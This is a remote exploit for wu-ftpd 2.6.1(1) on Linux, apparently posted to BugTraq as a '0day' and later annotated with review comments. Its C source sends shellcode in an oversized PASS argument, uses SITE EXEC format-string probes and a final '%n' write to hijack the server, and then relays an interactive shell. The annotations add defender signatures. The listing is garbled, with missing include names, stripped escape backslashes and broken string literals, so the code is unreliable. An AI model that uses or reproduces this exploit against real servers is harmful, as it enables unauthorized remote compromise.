wu-ftpd 2.6.1(1) on linux Exploit
Posted to BugTraq:
"hi,
this is an exploit for wu-ftpd 2.6.1(1) on linux
propz to segv for giving this to me
bringin' you the 0day from the hackweiser crew, australian chapter
cya,
Till"
Note: be advised that no code review has been performed; compile and execute at your own risk!
----
/*
* Linux wu-ftpd - 2.6.1(1)
*
* DiGiT
*/
#include
#include
#include
#include
#include
/*
 * linuxcode: the payload bytes that main() appends to the PASS argument
 * after a run of 0x90 bytes.
 *
 * Review: as extracted, the backslash of every escape sequence in this
 * literal is missing (it reads "x31xc0..." rather than byte escapes), so
 * the string no longer holds the values the author wrote; it is left
 * untouched here. The trailing run of values decodes to printable ASCII.
 * For defenders, the wire-level signature is a single, oversized PASS
 * argument consisting mostly of 0x90 bytes followed by this blob.
 */
char linuxcode[] =
"x31xc0x31xdbx31xc9xb0x46xcdx80x31xc0x31xdb"
"x43x89xd9x41xb0x3fxcdx80xebx6bx5ex31xc0x31"
"xc9x8dx5ex01x88x46x04x66xb9xffxffx01xb0x27"
"xcdx80x31xc0x8dx5ex01xb0x3dxcdx80x31xc0x31"
"xdbx8dx5ex08x89x43x02x31xc9xfexc9x31xc0x8d"
"x5ex08xb0x0cxcdx80xfexc9x75xf3x31xc0x88x46"
"x09x8dx5ex08xb0x3dxcdx80xfex0exb0x30xfexc8"
"x88x46x04x31xc0x88x46x07x89x76x08x89x46x0c"
"x89xf3x8dx4ex08x8dx56x0cxb0x0bxcdx80x31xc0"
"x31xdbxb0x01xcdx80xe8x90xffxffxffxffxffxff"
"x30x62x69x6ex30x73x68x31x2ex2ex31x31";
/*
 * main: proof-of-concept as posted to BugTraq for wu-ftpd 2.6.1(1) on Linux.
 *
 * Review notes (code left exactly as extracted; only comments added):
 *  - The listing is garbled: the header names after each #include and the
 *    backslash of every escape sequence were stripped, and many string
 *    literals are split across two lines. It does not compile as shown.
 *  - argv[1] is the FTP server (dotted IP or host name); the port is fixed
 *    at 21 by the 'port' variable. main has no return type (implicit int,
 *    pre-C99), and no read()/write() result is checked anywhere.
 *  - Visible flow: connect and read the banner, anonymous login whose PASS
 *    argument is a 0x90-filled buffer followed by linuxcode[], several
 *    SITE EXEC commands whose arguments are printf conversion specifiers,
 *    then an interactive relay between stdin and the socket.
 *  - Defender's view: the control-channel traffic is distinctive — an
 *    oversized PASS argument and SITE EXEC arguments containing '%'
 *    conversion specifiers. The program's own "not vulnerable" test is a
 *    server that echoes the "%x" back unexpanded (see the first probe).
 */
main (int argc, char *argv[])
{
char cmdbuf[8192];
char cbuf[1024];
char *t;
char nop[400];
int pip, i, a = 22, st = 0;
struct sockaddr_in sck;
struct hostent *hp;
long inet;
int port = 21;
fd_set fds;
/* Review: aa is read inside the search loop below before its only
 * assignment (aa = retb), i.e. an uninitialized read. */
unsigned int aa;
long reta, retb, tmp, retz;
int ret;
int add = 0;
/* Zero every buffer so the later strcat/strstr calls see NUL-terminated data. */
memset (cmdbuf, 0x0, sizeof (cmdbuf));
memset (cbuf, 0x0, sizeof (cbuf));
memset (nop, 0x0, sizeof (nop));
/* Exactly one argument is required: the target host. */
if (argc < 2)
{
fprintf (stderr, "Usage: %s [ip]
", argv[0]);
exit (-1);
}
/* Review: socket() signals failure with -1, not 0; this check only
 * fires if descriptor 0 happens to be handed out. */
pip = socket (PF_INET, SOCK_STREAM, 0);
if (!pip)
{
perror ("socket()");
exit (-1);
}
/* Resolve argv[1]: dotted-quad first, then a DNS lookup. Review: 'inet'
 * is a long but only 4 bytes are copied into it, which assumes a
 * 32-bit long. */
inet = inet_addr (argv[1]);
if (inet == -1)
{
if (hp = gethostbyname (argv[1]))
memcpy (&inet, hp->h_addr, 4);
else
inet = -1;
if (inet == -1)
{
fprintf (stderr, "Cant resolv %s!!
", argv[1]);
exit (-1);
}
}
sck.sin_family = PF_INET;
sck.sin_port = htons (port);
sck.sin_addr.s_addr = inet;
if (connect (pip, (struct sockaddr *) &sck, sizeof (sck)) < 0)
{
perror ("Connect() ");
exit (-1);
}
/* Read and print the server banner (cbuf was zeroed, read is bounded to
 * 1023 bytes, so it stays NUL-terminated). */
read (pip, cbuf, 1023);
fprintf (stderr, "Connected to: %s
", argv[1]);
fprintf (stderr, "Banner: %s
", cbuf);
/* Anonymous login. The PASS argument is nop[] filled with 0x90 up to
 * sizeof(nop) - strlen(linuxcode) - 10 bytes, then linuxcode[] appended;
 * the fit in the 400-byte array depends on that length arithmetic. This
 * oversized PASS argument is the first thing a defender sees on the wire. */
strcpy (cmdbuf, "user ftp
");
write (pip, cmdbuf, strlen (cmdbuf));
memset (nop, 0x90, sizeof (nop) - strlen (linuxcode) - 10);
strcat (nop, linuxcode);
memset (cmdbuf, 0x0, sizeof (cmdbuf));
sprintf (cmdbuf, "pass %s
", nop);
write (pip, cmdbuf, strlen (cmdbuf));
sleep (1);
/* Review: the reply is read into cmdbuf and cmdbuf is cleared on the very
 * next line, so the "530" login-failure test below can never match. */
read (pip, cmdbuf, sizeof (cmdbuf) - 1);
memset (cmdbuf, 0x0, sizeof (cmdbuf));
if (!strncmp (cmdbuf, "530", 3))
{
printf ("loggin incorrect : %s
", cmdbuf);
exit (-1);
}
fprintf (stderr, "Logged in..
");
fprintf (stderr, "+ Finding ret addresses
");
/* First SITE EXEC probe. The program concludes "not vulnerable" when the
 * reply still contains the literal "%x" at offset 4, i.e. the server
 * echoed the argument back unexpanded. */
memset (cmdbuf, 0x0, sizeof (cmdbuf));
strcpy (cmdbuf, "SITE EXEC %x %x %x %x +%x |%x
");
write (pip, cmdbuf, strlen (cmdbuf));
sleep (1);
memset (cmdbuf, 0x0, sizeof (cmdbuf));
read (pip, cmdbuf, sizeof (cmdbuf) - 1);
if (!strncmp (cmdbuf + 4, "%x", 2))
{
fprintf (stderr, "[1m[31mWuftpd is not vulnerable : %s
[0m",
cmdbuf);
exit (-1);
}
else
{
fprintf (stderr, "[1m[32mWuftpd is vulnerable : %s
[0m",
cmdbuf);
}
/* Review: strtoul's second parameter is char **endptr, but a char * into
 * cmdbuf is passed here (and at every strtoul call below), so the end
 * pointer is written into the buffer itself. If "|" or "+" is absent
 * from the reply, strstr returns NULL and the +1 is undefined. */
reta = strtoul (strstr (cmdbuf, "|") + 1, strstr (cmdbuf, "|") +
11, 16);
retz = strtoul (strstr (cmdbuf, "+") + 1, strstr (cmdbuf, "|") +
11, 16);
/* Second probe: 89 "%x" conversions followed by "|%x". */
memset (cmdbuf, 0x0, sizeof (cmdbuf));
strcpy (cmdbuf, "SITE EXEC ");
for (ret = 0; ret <= 88; ret++)
{
strcat (cmdbuf, "%x");
}
strcat (cmdbuf, "|%x
");
write (pip, cmdbuf, strlen (cmdbuf));
sleep (1);
memset (cmdbuf, 0x0, sizeof (cmdbuf));
read (pip, cmdbuf, sizeof (cmdbuf) - 1);
retb = strtoul (strstr (cmdbuf, "|") + 1, strstr (cmdbuf, "|") +
11, 16);
/* Review: %x/%u are applied to long values here and below. */
printf ("Ret location befor: %x
", reta);
/* Fixed adjustments chosen by the author; nothing in this listing
 * explains the constants. 'add' records which branch was taken and
 * steers the final command below. */
if (reta == 0)
reta = retz;
else
add = 600;
reta = reta - 0x58;
retb = retb + 100 - 0x2569 - add;
printf ("Ret location : %x
", reta);
printf ("Proctitle addres : %x and %u
", retb, retb);
sleep (2);
/* Dead store: the same command is rebuilt at the top of the loop below.
 * The 'xff' in the literal lost its backslash like the rest of the
 * listing; the four %c arguments are the bytes of reta. */
memset (cmdbuf, 0x0, sizeof (cmdbuf));
sprintf (cmdbuf, "SITE EXEC
aaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%cxff%c%c",
(reta & 0x000000ff), (reta & 0x0000ff00) >> 8,
(reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24);
a = 22;
memset (cbuf, 0x0, sizeof (cbuf));
/* Search loop: 'a' is incremented until one of the two "|%x" fields in
 * the reply equals reta. Review: there is no upper bound, so a
 * non-matching or silent server leaves this spinning; and the
 * "|%%x|%%x" format consumes no argument, so the aa expression passed
 * to sprintf is merely unused, but still an uninitialized read. */
while (1)
{
memset (cmdbuf, 0x0, sizeof (cmdbuf));
sprintf (cmdbuf, "SITE EXEC
aaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%cxff%c%c",
(reta & 0x000000ff), (reta & 0x0000ff00) >> 8,
(reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24);
for (i = 0; i <= 128; i++)
strcat (cmdbuf, "%.f");
for (i = 0; i <= a; i++)
strcat (cmdbuf, "%d");
sprintf (cbuf, "|%%x|%%x
", aa + 9807 - 460);
strcat (cmdbuf, cbuf);
write (pip, cmdbuf, strlen (cmdbuf));
memset (cmdbuf, 0x0, sizeof (cmdbuf));
read (pip, cmdbuf, sizeof (cmdbuf) - 1);
/* Review: t is NULL when the reply carries no "|"; t + 1 is then undefined. */
t = (char *) strstr (cmdbuf, "|");
tmp = strtoul (t + 1, t + 11, 16);
if (tmp != 0)
{
fprintf (stderr, "tmp 1 : 0x%x
", tmp);
if (tmp == reta)
{
fprintf (stderr, "Cached a : %d
", a);
st = 1;
break;
}
tmp = strtoul (t + 11, t + 22, 16);
fprintf (stderr, "tmp 2 : 0x%x
", tmp);
if (tmp == reta)
{
fprintf (stderr, "Cached a : %d
", a);
st = 2;
break;
}
}
/* Dead check: every assignment to st is immediately followed by break. */
if (st > 0)
break;
a++;
}
/* Final SITE EXEC: built like the probes, but the trailing field ends in
 * a "%n" conversion whose precision is derived from retb. For defenders,
 * a "%n" inside a SITE EXEC argument has no legitimate use and is the
 * highest-signal indicator in this exchange. Review: aa is assigned from
 * the long retb, truncating on 64-bit targets. */
sleep (1);
memset (cmdbuf, 0x0, sizeof (cmdbuf));
memset (cbuf, 0x0, sizeof (cbuf));
sprintf (cmdbuf, "SITE EXEC
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%cxff%c%c",
(reta & 0x000000ff), (reta & 0x0000ff00) >> 8,
(reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24);
for (i = 0; i <= 128; i++)
strcat (cmdbuf, "%.f");
/* 'a' is backed off by one unless the first probe set add = 600. */
if (add != 600)
a = a - 1;
fprintf (stderr, "Trying with : %d
", a);
for (i = 0; i <= a; i++)
strcat (cmdbuf, "%d");
aa = retb;
if (add == 600)
sprintf (cbuf, "|%%.%ud%%n
", aa + 9807);
else
sprintf (cbuf, "|%%.%ud%%n
", aa + 9807 - 480);
strcat (cmdbuf, cbuf);
write (pip, cmdbuf, strlen (cmdbuf));
memset (cmdbuf, 0x0, sizeof (cmdbuf));
read (pip, cmdbuf, sizeof (cmdbuf) - 1);
memset (cmdbuf, 0x0, sizeof (cmdbuf));
fprintf (stderr, "[1m[33m Wait for a shell.....
[0m");
/* Interactive relay between stdin (fd 0) and the socket. Review:
 * select()'s first argument should be the highest descriptor + 1, not
 * 255; the read(0, ...) result is unchecked, so EOF on stdin makes the
 * loop spin writing zero bytes; and the close() after the loop is
 * unreachable because the loop only exits via exit(). */
while (1)
{
FD_ZERO (&fds);
FD_SET (0, &fds);
FD_SET (pip, &fds);
select (255, &fds, NULL, NULL, NULL);
if (FD_ISSET (pip, &fds))
{
memset (cbuf, 0x0, sizeof (cbuf));
ret = read (pip, cbuf, sizeof (cbuf) - 1);
if (ret <= 0)
{
printf ("Connection closed - EOF
");
exit (-1);
}
printf ("%s", cbuf);
}
if (FD_ISSET (0, &fds))
{
memset (cbuf, 0x0, sizeof (cbuf));
read (0, cbuf, sizeof (cbuf) - 1);
write (pip, cbuf, strlen (cbuf));
}
}
close (pip);
}